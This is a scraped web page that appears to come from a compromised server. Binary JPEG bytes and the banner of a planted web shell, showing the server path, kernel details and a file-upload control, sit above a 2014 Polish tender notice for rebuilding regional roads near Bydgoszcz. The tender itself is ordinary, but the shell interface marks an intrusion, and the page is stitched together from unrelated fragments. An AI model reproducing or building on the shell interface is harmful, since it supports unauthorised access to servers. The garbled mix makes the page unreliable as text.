JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140901/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140901/289434-N-2014.html

<p class="kh_header"><b>Bydgoszcz: Przebudowa ciągów dróg wojewódzkich:
Zadanie nr 1: Przebudowa drogi wojewódzkiej nr 241 Tuchola - Rogoźno odcinek Wiele - Mrocza od km 49+600 do km 55+610

Zadanie nr 2: Przebudowa drogi wojewódzkiej nr 239 Błądzim - Świecie odcinek Gródek - Krąplewice od km 19+750 do km 22+198</b><br>
<b>Numer ogłoszenia: 289434 - 2014; data zamieszczenia: 01.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd  Dróg Wojewódzkich , ul. Fordońska 6, 85-085 Bydgoszcz, woj. kujawsko-pomorskie, tel. (52) 370-57-17, faks (52) 370-57-16.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw-bydgoszcz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ciągów dróg wojewódzkich:
Zadanie nr 1: Przebudowa drogi wojewódzkiej nr 241 Tuchola - Rogoźno odcinek Wiele - Mrocza od km 49+600 do km 55+610

Zadanie nr 2: Przebudowa drogi wojewódzkiej nr 239 Błądzim - Świecie odcinek Gródek - Krąplewice od km 19+750 do km 22+198.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Nazwa zamówienia:  

Przebudowa ciągów dróg wojewódzkich:
Zadanie nr 1: Przebudowa drogi wojewódzkiej nr 241 Tuchola - Rogoźno odcinek Wiele - Mrocza od km 49+600 do km 55+610

Zadanie nr 2: Przebudowa drogi wojewódzkiej nr 239 Błądzim - Świecie odcinek Gródek - Krąplewice od km 19+750 do km 22+198

Przyjmuje się zasadę: 1 zadanie - 1 oferta; 2 zadania - 2 oferty; Oznacza to, iż na każde z wyżej wymienionych zadań Wykonawca zobowiązany jest złożyć odrębną ofertę.

2.	 W ramach zamówienia należy wykonać:
Zadanie 1
A) branża drogowa
- roboty rozbiórkowe
- wykonanie wzmocnienia jezdni o nawierzchni bitumicznej szer. 6.0m (w-wa ścieralna gr. 5cm, w-wa 
- wiążąca gr. 8cm, w-wa wyrównawcza min. 4cm z betonu asfaltowego)
- wykonanie nowej jezdni (w-wa ścieralna gr. 5cm SMA, siatka wzmacniająca konstrukcję, w-wa wiążąca gr. 5cm, podbudowa zasadnicza z betonu asfaltowego, podbudowa pomocnicza z kruszywa  łamanego, w-wa gruntu stabilizowanego cementem gr. 15cm)
- wykonanie chodnika z kostki brukowej betonowej gr. 8cm
- wykonanie zjazdów o nawierzchniach z betonu asfaltowego i kostki brukowej betonowej,
- wykonanie 6 zatok autobusowych o nawierzchni z kostki betonowej szer. 3,00 wraz z peronami dł. 20,00m i szer. 1,5m,
- ściek z płyt prefabrykowanych trójkątnych,
- mury oporowe z prefabrykatów typu L 750mm oraz z gazonów prefabr. 50x30x30cm,
- wykonanie poboczy o szer. 1,25m i gr. 15,00cm,
- odtworzenie rowów z obsianiem trawą,
- wycinka drzew w pasie drogowym,
- oznakowanie pionowe i poziome,

B) branża mostowa
- wzmocnienie konstrukcji przęsła,
- wykonanie nowej izolacji,
- zamocowanie płyt przejściowych,
- rozbiórka i wykonanie obmurowania przyczółków,
- istniejących i zamocowanie nowych balustrad i barier drogowych,
- wykonanie nowych nawierzchni drogi i chodnika na obiekcie,
- naprawa przejścia wzdłuż cieku wodnego pod mostem,
- naprawa stożków skarpowych z ich umocnieniem,
- włączenie odwodnienia obiektu w system odwodnienia remontowanej drogi.

- promocja: 2 tablice informacyjne i 2 tablice pamiątkowe w ramach kosztów pośrednich Wykonawcy wraz z jednokrotną zmianą treści tablicy w ciągu 6 m-cy po ustawieniu tablicy pamiątkowej. Zmiana nastąpi poprzez naklejenie nowej wartości robót.

Wytyczne na stronie: http://www.mojregion.eu/regionalny-program-operacyjny-wojewodztwa-kujawsko-pomorskiego/promocja/oznakowanie-projektu.html

Zadanie 2
- przebudowa jezdni poprzez wykonanie poszerzenia obustronnego po 1,0 m i wzmocnienie konstrukcji jezdni odpowiadające wymaganiom dla KR-3,
-  przebudowa poboczy,
-  przebudowa nawierzchni istniejących zjazdów,
-  profilowanie skarp rowów,
- promocja: 2 tablice informacyjne i 2 tablice pamiątkowe w ramach kosztów pośrednich Wykonawcy wraz z jednokrotną zmianą treści tablicy w ciągu 6 m-cy po ustawieniu tablicy pamiątkowej. Zmiana nastąpi poprzez naklejenie nowej wartości robót.

Wytyczne na stronie: http://www.mojregion.eu/regionalny-program-operacyjny-wojewodztwa-kujawsko-pomorskiego/promocja/oznakowanie-projektu.html

Tablice informacyjne i pamiątkowe:
- wykonanie i dostawa oraz montaż we wskazane przez Zamawiającego miejsce: nowych tablic informacyjnych o wymiarach 1500mm x 2000mm - blacha ocynkowana, na słupach stalowych oraz nowych tablic pamiątkowych o wymiarach 1500mm x 2000mm - blacha ocynkowana, na słupach stalowych.

- koszty wynikające z wykonania, dostawy, ustawienia i aktualizacji wartości na tablicach informacyjnych i pamiątkowych wykonawca winien wkalkulować w kosztach pośrednich budowy. 

- przed wykonaniem i ustawieniem tablic Zamawiający wymaga wcześniejszego uzgodnienia pozycji układu graficznego, jak również nadruku i wszystkich innych form znakowania w formie mailowej z Zamawiającym - Wydziałem Inwestycji, ul. Fordońska 44, Bydgoszcz.

- lokalizacje dostawy i montażu nowych tablic informacyjnych i pamiątkowych wskaże Zamawiający po podpisaniu umowy.          

3. Wykonawca jest zobowiązany do zapewnienia bezpiecznych warunków ruchu drogowego  kołowego i pieszego w rejonie prowadzonych robót objętych umową na podstawie aktualnego projektu tymczasowej organizacji ruchu (na czas prowadzonych robót) załączonego do dokumentacji technicznej, posiadającego zatwierdzenie Zarządzającego ruchem na drogach wojewódzkich tj. Urząd Marszałkowski w Toruniu. 

Po zakończeniu robót należy zgłosić do ZDW i Urzędu Marszałkowskiego wygaśnięcie czasowej organizacji ruchu i przywrócenie obowiązywania stałej organizacji ruchu lub wprowadzenie nowej o ile dotyczy danego zadania.
Wykonawca w okresie wykonywania przedmiotu umowy ponosi pełną odpowiedzialność za wszelkie szkody wyrządzone w związku z prowadzonymi robotami, w tym także ruchem pojazdów mechanicznych.

4.	Zamawiający dopuszcza rozwiązania równoważne w stosunku do opisywanych 
w dokumentacji technicznej. Wykonawca, który zaoferuje rozwiązania równoważne, musi wykazać, że oferowany przez niego przedmiot zamówienia jest równoważny czyli spełnia wymagania określone przez Zamawiającego w opisie przedmiotu zamówienia i zapewni uzyskanie parametrów technicznych nie gorszych od założonych  przy zachowaniu tych samych standardów technicznych, technologicznych i jakościowych. Wykaz zastosowanych i przyjętych przez Wykonawcę materiałów lub urządzeń równoważnych musi zostać załączony do oferty. Zamawiający dokona oceny równoważności w stosunku do wymagań odnoszących 
się do przedmiotu zamówienia  przekazanym wykonawcom a zawartym w opisie zamówienia - odpowiednio projekcie wykonawczym lub budowlano - wykonawczym. 

5.	Zaleca się, aby Wykonawcy dokonali wizji lokalnej na terenie realizacji przedmiotu zamówienia i w jego okolicy w celu dokonania oceny dokumentów i informacji przekazywanych w ramach niniejszego postępowania przez Zamawiającego.

6.	Zamawiający informuje, że materiały z rozbiórek nie nadające się do ponownego wykorzystania są własnością Wykonawcy. Rodzaj materiałów oraz ich ilości nie nadające 
się do ponownego wbudowania określi w trakcie realizacji zamówienia inspektor nadzoru. Materiały, które nadają się do powtórnego wbudowania zgodnie z decyzją inspektora nadzoru 
są własnością Zamawiającego i po oczyszczeniu należy je odwieźć za pokwitowaniem ilości 
i asortymentu do Rejonu Dróg Wojewódzkich. Rozliczenie materiałów rozbiórkowych musi być protokolarne.

7.	Szczegółowy zakres i warunki wykonania robót określają Szczegółowe Specyfikacje Techniczne wykonania i odbioru oraz przedmiary robót będące integralną częścią dokumentacji projektowej. 

8.	Wykonawca zobowiązuje się do prowadzenia we własnym zakresie stałego nadzoru archeologicznego przez osobę zdolną do wykonywania tego rodzaju robót, o odpowiednich kwalifikacjach zawodowych.

9.	Dotyczy zadania nr 1 - Przy wycince drzew przydrożnych Wykonawca zobowiązany jest do sporządzenia operatu brakarskiego a uzyskane środki ze sprzedaży drewna przekaże Zamawiającemu na konto dochodów budżetowych 20 1020 1475 0000 8902 0093 8183.                    W ramach wycinki drzew należy nasadzić sadzonkę w takiej ilości ile zostało wyciętych drzew, w miejscu wskazanym przez Inspektora nadzoru, a w przypadku, gdy Decyzja na wycinkę drzew wydana przez Burmistrza wg ich lokalizacji: Więcborka i Nakła stanowi inaczej należy zastosować się do jej zapisu.
10.	Dotyczy zadania nr 1 - Wykonawca przeprowadzi analizę akustyczną w 12 wytypowanych punktach obserwacji na granicy terenów chronionych przed hałasem - terenów zabudowy zagrodowej oraz mieszkaniowej wielorodzinnej przed rozpoczęciem i po zakończeniu robót. Do analizy należy obowiązkowo przyjąć punkt: km 53+475. Wykonawca wyniki przekaże Zamawiającemu w formie pisemnego  raportu z wnioskami.

9. PŁATNOŚCI: kwota wynikająca z faktury będzie płatna w terminie 30 dni od daty doręczenia i przyjęcia faktury przez Zamawiającego. W przypadku zadania nr 1 i 2 płatność będzie częściowa, tzn. do końca roku 2014 w wysokości nie większej niż:
Zadanie nr 1 - 2 488 000,00 zł brutto,
Zadanie nr 2 - 1 490 400,00 zł brutto,
Jednakże, wartości na zadaniach na 2014r mogą ulegać zmniejszeniu lub zwiększeniu co jest uzależnione od ilości wykonanych prac, wówczas wskazane kwoty na płatności w 2014r. dla zadań nr 1 i 2 mogą ulec zwiększeniu ze względu na oszczędności, jednakże nie więcej niż o kwotę uzyskanych oszczędności..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zgodnie z art. 67 ust. 1 pkt 6 ustawy Pzp Zamawiający przewiduje udzielanie zamówienia uzupełniającego, jednakże w wysokości nie większej niż 10% wartości zamówienia podstawowego i polegającego na powtórzeniu tego samego rodzaju zamówienia.
Warunkiem udzielenia zamówień uzupełniających jest posiadanie środków finansowych 
na ich wykonanie. Na okoliczność wystąpienia zamówień uzupełniających, zostanie zawarta umowa w trybie zamówienia z wolnej ręki.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca jest zobowiązany do wniesienia wadium w wysokości:
    - Zadanie nr 1 -  200 000,00 zł brutto
    - Zadanie nr 2 - 100 000,00 zł brutto
				
2. Wadium może być wniesione w jednej lub kilku następujących formach:
a) pieniądzu wpłacone przelewem w rozumieniu prawa bankowego na konto Zamawiającego 
na rachunek wadiów prowadzony przez PKO BP S.A. nr rachunku: 16 1020 1475 0000 8302 0093 7482.
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, 
z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy 
z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity Dz. U z 2007 Nr 42 poz. 275 z późn. zmianami.).
3. Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem ust. 4.
4. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi 
na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów 
lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp lub pełnomocnictw, chyba 
że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
5. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a) odmówił podsiania umowy w sprawie zamówienia publicznego na warunkach określonych 
w ofercie,
b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.  
6. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonaniu umowy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczególnych wymagań</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, zrealizował co najmniej:
dla zadania nr 1:
1 zamówienie obejmujące budowę, przebudowę, remont drogi w technologii porównywalnej, 
o wartości nie mniejszej niż  10 000 000,00 zł brutto lub 2 zamówienia obejmujące budowę, przebudowę, remont drogi w technologii porównywalnej o wartości nie mniejszej 
niż 5 000 000,00 zł brutto każda.
dla zadania nr 2:
1 zamówienie obejmujące budowę, przebudowę, remont drogi w technologii porównywalnej, 
o wartości nie mniejszej niż  4 000 000,00 zł brutto lub 2 zamówienia obejmujące budowę, przebudowę, remont drogi w technologii porównywalnej o wartości nie mniejszej 
niż 2 000 000,00 zł brutto każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować potencjałem technicznym: 
1. dla zadania nr 1:
a) wytwórnia mieszanek mineralno-asfaltowych wyposażona w jedną otaczarkę o mieszaniu cyklicznym lub ciągłym z możliwością podgrzewania kruszywa. Otaczarka musi być wyposażona w automatyczny dozownik stabilizatora. Wydajność otaczarki nie mniejsza niż 100 Mg/h - 1 szt, lub sprzęt równoważny
b) wytwórnia stacjonarna lub mobilna do wytwarzania mieszanki betonowej, wyposażonej               w urządzenie do wagowego dozowania wszystkich składników, gwarantujące następujące tolerancje dozowania, wyrażone w stosunku do masy poszczególnych składników: kruszywo ?3%, cement ?0,5%, woda ?2% - 1 szt, lub sprzęt równoważny
c) sprzęt do mechanicznego rozkładania mieszanki bitumicznej - jedna układarka mas bitumicznych wyposażona w sterownik elektroniczny pozwalający na ułożenie w-wy                 z założoną grubością oraz równością, posiadający regulacje stołu oraz podgrzewaną deskę wibracyjną - 1 szt, lub sprzęt równoważny
d) skrapiarka lepiszcza wyposażona w urządzenie pomiarowe oraz mechanizmy regulacyjne, które zapewniają równomierne rozłożenie lepiszcza w kierunku podłużnym 
i poprzecznym - 1 szt., lub sprzęt równoważny
e) szczotka mechaniczna -  1 szt., lub sprzęt równoważny
f) frezarka do nawierzchni bitumicznych - 1 szt., lub sprzęt równoważny
g) walec statyczny samojezdny -  1 szt., lub sprzęt równoważny
h) walec stalowy samojezdny -  1 szt., lub sprzęt równoważny
i) sprzęt zagęszczający w-wy konstrukcyjne - 1 szt. lub sprzęt równoważny
j) koparka  o pojemności łyżki min 0,6 m3 - 1 szt. lub sprzęt równoważny
k) samochody samowyładowcze z przekryciem lub termosy (5Mg, 10Mg, 14Mg, 25Mg - po 1 szt. z każdego tonażu) lub sprzęt równoważny
l) malowarka drogowa do układania mas termoplastycznych- 1 szt. lub sprzęt równoważny;
2.dla zadania nr 2:
a) wytwórnia mieszanek mineralno-asfaltowych wyposażona w jedną otaczarkę o mieszaniu cyklicznym lub ciągłym z możliwością podgrzewania kruszywa. Otaczarka musi być wyposażona w automatyczny dozownik stabilizatora. Wydajność otaczarki nie mniejsza niż 100 Mg/h - 1 szt, lub sprzęt równoważny
b) sprzęt do mechanicznego rozkładania mieszanki bitumicznej - jedna układarka mas bitumicznych wyposażona w sterownik elektroniczny pozwalający na ułożenie w-wy                 z założoną grubością oraz równością, posiadający regulacje stołu oraz podgrzewaną deskę wibracyjną - 1 szt, lub sprzęt równoważny
c) skrapiarka lepiszcza wyposażona w urządzenie pomiarowe oraz mechanizmy regulacyjne, które zapewniają równomierne rozłożenie lepiszcza w kierunku podłużnym 
i poprzecznym - 1 szt., lub sprzęt równoważny
d) szczotka mechaniczna -  1 szt., lub sprzęt równoważny
e) frezarka do nawierzchni bitumicznych - 1 szt., lub sprzęt równoważny
f) walec statyczny samojezdny -  1 szt., lub sprzęt równoważny
g) walec stalowy samojezdny -  1 szt., lub sprzęt równoważny
h) walec wibracyjny gładki  - 1 szt., lub sprzęt równoważny
i) sprzęt zagęszczający w-wy konstrukcyjne - 1 szt. lub sprzęt równoważny
j) koparko - ładowarka - 1 szt. lub sprzęt równoważny
k) samochody samowyładowcze z przekryciem lub termosy (5Mg, 10Mg, 14Mg, 25Mg - po 1 szt. z każdego tonażu) lub sprzęt równoważny
l) spycharka - 1 szt., lub sprzęt równoważny
ł) ładowarka - 1 szt., lub sprzęt równoważny
m) malowarka drogowa do układania mas termoplastycznych- 1 szt. lub sprzęt równoważny</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować osobami zdolnymi do wykonania zamówienia: 
dla zadania nr 1:

Kierownik budowy - 1 osoba posiadająca uprawnienia do kierowania robotami budowlanymi w specjalności drogowej lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, do wykonywania, których w aktualnym stanie prawnym uprawniają uprawnienia budowlane w tej specjalności. 
Kierownik robót w zakresie robót mostowym - 1 osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności mostowej lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, do wykonywania, których w aktualnym stanie prawnym uprawniają uprawnienia budowlane w tej specjalności,

dla zadania nr 2:
Kierownik budowy - 1 osoba posiadająca uprawnienia do kierowania robotami budowlanymi w specjalności drogowej lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, do wykonywania, których w aktualnym stanie prawnym uprawniają uprawnienia budowlane w tej specjalności.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczególnych wymagań</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
